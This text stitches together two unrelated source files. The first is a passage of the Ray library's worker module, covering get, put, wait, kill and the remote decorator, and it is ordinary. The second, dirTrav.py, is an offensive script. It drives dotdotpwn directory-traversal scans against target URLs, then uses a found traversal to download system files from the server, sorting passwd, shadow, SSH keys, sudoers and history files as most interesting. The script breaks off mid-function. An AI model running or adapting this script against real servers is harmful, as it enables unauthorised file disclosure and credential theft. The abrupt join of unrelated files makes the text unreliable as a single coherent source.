current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
tracing_hook_val = worker.gcs_client.internal_kv_get(
b"tracing_startup_hook", ray_constants.KV_NAMESPACE_TRACING)
if tracing_hook_val is not None:
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
tracing_hook_val.decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if worker.gcs_pubsub_enabled:
worker.gcs_function_key_subscriber.close()
worker.gcs_error_subscriber.close()
worker.gcs_log_subscriber.close()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
        key (str): The key name for the message. Multiple messages under
            different keys will be displayed at the same time. Messages
under the same key will be overridden.
        dtype (str): The type of message for rendering. One of the
            following: text, html.
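    Example (illustrative only; assumes this is called from inside a task
    or actor and that the dashboard is running):
    .. code-block:: python
        ray.worker.show_in_dashboard("Processed 500/1000 records",
                                     key="progress")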
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
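    Example (a minimal sketch; assumes ``ray.init()`` has already been
    called and that the cluster has at least one CPU available):
    .. code-block:: python
        @ray.remote
        def f(x):
            return x + 1
        ref = f.remote(1)
        assert ray.get(ref) == 2
        refs = [f.remote(i) for i in range(3)]
        assert ray.get(refs) == [1, 2, 3]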
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
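    Example (illustrative only; assumes ``ray.init()`` has already been
    called):
    .. code-block:: python
        ref = ray.put([1, 2, 3])
        assert ray.get(ref) == [1, 2, 3]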
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
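    Example (a minimal sketch; assumes ``ray.init()`` has already been
    called; ``slow_task`` is a toy remote function defined for this example):
    .. code-block:: python
        import time
        @ray.remote
        def slow_task(i):
            time.sleep(i)
            return i
        refs = [slow_task.remote(i) for i in range(4)]
        # Block until at least two of the four tasks have finished.
        ready, not_ready = ray.wait(refs, num_returns=2)
        assert len(ready) == 2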
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
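    Example (illustrative sketch; the actor class and the name "singleton"
    are assumptions made for this example):
    .. code-block:: python
        @ray.remote
        class Counter:
            def ping(self):
                return "pong"
        Counter.options(name="singleton").remote()
        handle = ray.get_actor("singleton")
        assert ray.get(handle.ping.remote()) == "pong"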
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
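    Example (illustrative only; ``actor_handle`` is assumed to be a handle
    returned by ``SomeActor.remote()`` or ``ray.get_actor``):
    .. code-block:: python
        ray.kill(actor_handle)
        # To let Ray restart the actor (if it is restartable), use:
        # ray.kill(actor_handle, no_restart=False)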
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
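    Example (a minimal sketch; assumes ``ray.init()`` has already been
    called; ``blocking_task`` is a toy remote function defined here):
    .. code-block:: python
        import time
        @ray.remote
        def blocking_task():
            time.sleep(10**6)
        ref = blocking_task.remote()
        ray.cancel(ref)
        try:
            ray.get(ref)
        except ray.exceptions.TaskCancelledError:
            # Raised as documented above; if the task had already started,
            # the error may instead surface as a RayTaskError.
            pass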
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
placement_group="default",
worker=None,
retry_exceptions=None,
concurrency_groups=None,
scheduling_strategy: SchedulingStrategyT = None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env, placement_group, scheduling_strategy)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(
function_or_class, num_cpus, num_gpus, memory,
object_store_memory, resources, accelerator_type, max_restarts,
max_task_retries, runtime_env, concurrency_groups,
scheduling_strategy)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
A running remote actor is terminated when the last Python actor handle
to it is deleted; the actor then completes any outstanding work and
shuts down. To kill an actor immediately instead, call
``ray.kill(actor)``.
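For example (a minimal illustrative sketch):
.. code-block:: python
a = Foo.remote()
ray.kill(a)  # terminate immediately instead of waiting for the handle to be deleted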
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4, and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
scheduling_strategy (SchedulingStrategyT): Strategy for scheduling
the remote function or actor. Possible values are
None: Ray figures out the scheduling strategy to use; it
will either be the PlacementGroupSchedulingStrategy using parent's
placement group if parent has one and has
placement_group_capture_child_tasks set to true,
or "DEFAULT";
"DEFAULT": default hybrid scheduling;
"SPREAD": best effort spread scheduling;
`PlacementGroupSchedulingStrategy`:
placement group based scheduling.
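As an illustrative sketch (using only the strategy values listed above), a
strategy can be supplied at definition time or overridden via ``.options()``:
.. code-block:: python
@ray.remote(scheduling_strategy="SPREAD")
def spread_task():
return 1
# Override at the call site; "DEFAULT" restores hybrid scheduling.
ref = spread_task.options(scheduling_strategy="DEFAULT").remote()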
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
"runtime_env",
"retry_exceptions",
"placement_group",
"concurrency_groups",
"scheduling_strategy",
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
placement_group = kwargs.get("placement_group", "default")
retry_exceptions = kwargs.get("retry_exceptions")
concurrency_groups = kwargs.get("concurrency_groups")
scheduling_strategy = kwargs.get("scheduling_strategy")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
placement_group=placement_group,
worker=worker,
retry_exceptions=retry_exceptions,
concurrency_groups=concurrency_groups or [],
scheduling_strategy=scheduling_strategy)
|
dirTrav.py
|
#!/usr/bin/python
#ONLY WEB HAS BEEN IMPLEMENTED
#If /usr/share/dotdotpwn/Reports exists, dotdotpwn will automatically put raw results in there for you
#Reconscan.py creates the Reports directory for you
import sys
import os
import subprocess
from subprocess import CalledProcessError
import argparse
import multiprocessing
from multiprocessing import Process, Queue
import requests
import time
from shutil import move
#This function currently runs a regular and an extension-based web scan using dotdotpwn on a list of URLs
#If something is found, the raw output is written to the results/exam/dotdotpwn/ directory
def dotPwn(URL):
#Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
# Available options:
# -m Module [http | http-url | ftp | tftp | payload | stdout]
# -h Hostname
# -O Operating System detection for intelligent fuzzing (nmap)
# -o Operating System type if known ("windows", "unix" or "generic")
# -s Service version detection (banner grabber)
# -d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
# -f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
# -E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
# -S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
# -u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
# -k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
# -p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
# -x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
# -t Time in milliseconds between each test (default: 300 (.3 second))
# -X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
# -e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
# -U Username (default: 'anonymous')
# -P Password (default: 'dot@dot.pwn')
# -M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
# -r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
# -b Break after the first vulnerability is found
# -q Quiet mode (doesn't print each attempt)
# -C Continue if no data was received from host
# why am I not using the -p option for filename with payloads?
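# Illustrative example of the command this builds (hypothetical target, os=unix, default depth 10, HTTP port 80):
#   dotdotpwn.pl -m http-url -u http://10.0.0.5/index.php?x=TRAVERSAL -h <baseURL> -k "root:" -f /etc/passwd -d 10 -o unix -x 80 -t 1 -q -C -b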
port, resultsOut, baseURL, URL, module = parseURL(URL)
konfirmString,konfirmFile = setDotPwnOptions()
if ("TRAVERSAL" in URL):
#last update added 'module' (previously http-url) and -h for host. May need to revert
#if the -h option breaks http-url
DOTPWN = 'dotdotpwn.pl -m %s -u %s -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -q -C -b' % (module, URL, baseURL, konfirmString, konfirmFile, args.depth, args.os, port)
print "DOTPWN: %s" % DOTPWN
DOTPWNE = 'dotdotpwn.pl -m %s -u %s -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (module, URL, baseURL, konfirmString, konfirmFile, args.depth, args.os, port, args.extensions)
else:
print "WARN: NO 'TRAVERSAL' TARGETING STRING FOUND IN URL"
DOTPWN = 'dotdotpwn.pl -m http -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -q -C -b' % (baseURL, konfirmString, konfirmFile, args.depth, args.os, port)
DOTPWNE = 'dotdotpwn.pl -m http -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (baseURL, konfirmString, konfirmFile, args.depth, args.os, port, args.extensions)
try:
DOTPWNRESULTS = subprocess.check_output(DOTPWN, shell=True)
except CalledProcessError as ex:
writeOutputFile = True
text = ex.output.split("\n")
for line in text:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s" % resultsOut
print "INFO: Traversals found! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(ex.output)
outFileWriter.close()
except:
raise
if (len(vuln) == 0): #don't run extension scan if we already have a vuln
try:
DOTPWNERESULTS = subprocess.check_output(DOTPWNE, shell=True)
except CalledProcessError as fx:
writeOutputFile = True
textE = fx.output.split("\n")
for line in textE:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s using file extensions" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/E%s" % resultsOut
print "INFO: Traversals found using extensions! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(fx.output)
outFileWriter.close()
except:
raise
if (args.scan_and_retrieve and len(vuln) > 0):
print "INFO: Downloading files"
retrieve()
#grab pieces to build URL, feed in files to grab,
def retrieve():
vulnURLs = analyzeVuln(vuln)
tmp = vulnURLs[0]
vulnProto = tmp[0]
vulnBase = tmp[1]
vulnPage = tmp[2]
vulnStringPrefix = tmp[3]
vulnStringSuffix = tmp[4]
encodedSplit = tmp[5]
try:
xfilFileName = "%s" % args.xfil_files
xfilFile = open(xfilFileName,'r')
for xfil in xfilFile:
if (xfil[0] == "/"):
xfil = xfil[1:]
if ("\n" in xfil):
xfil = xfil[:-1]
xfiltmp = xfil.replace("/", "_") #for outputFile
vulnBasetmp = vulnBase.replace("/", "_") #for outputFile
xfil = xfil.replace("/", encodedSplit)
#2x vulnStringPrefix due to a parsing bug. Additional shouldn't hurt....
if vulnPage == "":
fullURL = vulnProto + vulnBase + vulnStringPrefix + vulnStringPrefix + xfil + vulnStringSuffix
else:
fullURL = vulnProto + vulnBase + vulnPage + vulnStringPrefix + vulnStringPrefix + xfil + vulnStringSuffix
#print "DEBUG: %s" % fullURL
fileContents, status_code = grabFileFromURL(fullURL)
if (status_code == 200):
outputFile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s_%s" % (vulnBasetmp, xfiltmp)
try:
output = open(outputFile, 'w+')
output.write(fileContents)
output.close()
except UnicodeEncodeError:
#print "WARNING: Unicode errors. Forcing ascii, xmlcharrefreplace"
output = open(outputFile, 'w+')
fileContents = fileContents.encode('ascii','xmlcharrefreplace')
output.write(fileContents)
output.close()
except:
raise
except:
raise
sortRetrievedFiles()
time.sleep(1)
sortMostInterestingFiles()
time.sleep(1)
sortEverythingElse()
print "INFO: Downloading of files complete"
def grabFileFromURL(url):
try:
r = requests.get(url)
if (r.status_code == 200):
return r.text, r.status_code
else:
return False, r.status_code
except:
raise
def sortRetrievedFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
sizes = []
moveTheseFiles = []
for item in files:
if os.path.isfile(item):
sizes.append(os.path.getsize(item))
for size in sizes:
if sizes.count(size) > 3:
moveTheseFiles.append(size)
for sizeOfitems in moveTheseFiles:
try:
os.makedirs(str(sizeOfitems))
except:
pass
#print "Warning: Dir already exists"
for items in files[:]: #iterate over a copy since items are removed from 'files' below
if os.path.getsize(items) == sizeOfitems:
newpath = "./%s/%s" % (str(sizeOfitems),items)
os.rename(items,newpath)
files.remove(items)
def sortMostInterestingFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
mostInterestingFiles = "passwd","shadow","id_rsa","id_dsa","passdb","samba","ssh","authorized","sudoers","history"
try:
os.makedirs("mostInteresting")
except:
pass
for item in files:
for name in mostInterestingFiles:
if (name in item):
new = "./mostInteresting/%s" % (item)
move(item,new)
break
def sortEverythingElse():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
everythingElse = "etc","var","proc"
try:
for folder in everythingElse:
os.makedirs(folder)
except:
pass
for item in files:
